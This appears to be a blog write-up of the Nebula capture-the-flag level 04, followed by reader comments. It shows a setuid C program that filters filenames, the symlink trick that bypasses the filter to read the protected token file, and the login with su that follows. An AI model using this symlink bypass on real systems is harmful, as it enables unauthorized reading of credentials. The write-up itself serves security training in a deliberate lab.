This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
#include
#include
#include
#include
#include
#include
int main(int argc, char **argv, char **envp)
{
char buf[1024];
int fd, rc;
if(argc == 1) {
printf("%s [file to read]\n", argv[0]);
exit(EXIT_FAILURE);
}
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
}
fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);
}
rc = read(fd, buf, sizeof(buf));
if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);
}
write(1, buf, rc);
}
This program looks like it will read the file passed to it by the first argument. Let’s test that out:
level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
Everything as expected then. The problem is that it explicitly forbids opening of files called token. How can we get round this?
Symbolic links to the rescue again!
level04@nebula:~$ ln -s /home/flag04/token Token
level04@nebula:~$ /home/flag04/flag04 /home/level04/Token
06508b5e-8909-4f38-b630-fdb148a848a2
Just create a symbolic link to a name that doesn’t match “token”.
So what is this long string? Seems sensible to try and login to the flag04 account with it:
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
emily
June 25, 2017 at 4:24ambut how?
In order to logon to another user I have to logout.
Then when I go to login with user flag04 I’m asked for a password and since I don’t know the password, I can’t execute ‘getflag’. Can’t copy the string to use it as a password bc I can’t select and copy shit from my terminal. grrrrrrrrrrrr
Fucking irritating
Hideki
December 4, 2017 at 1:33amyou should try learning some linux first..
you can use “su flag04” for example.
Bon
November 19, 2017 at 7:11pmDon’t logout, use :
$ su flag04